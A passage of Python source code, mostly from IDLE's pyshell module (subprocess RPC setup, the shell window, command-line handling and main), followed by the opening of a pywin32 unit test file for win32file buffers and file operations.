self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.pyshell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import iomenu
# try:
# source = source.encode(iomenu.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
self.console = PseudoOutputFile(self, "console", iomenu.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use TextViewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume what printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
else:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['pyshell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
try:
import win32timezone
except SyntaxError:
# win32timezone uses decorators and isn't compatible with py2.3
assert sys.version_info < (2,4)
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
try:
fd, filename = tempfile.mkstemp()
except AttributeError:
self.fail("This test requires Python 2.3 or later")
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
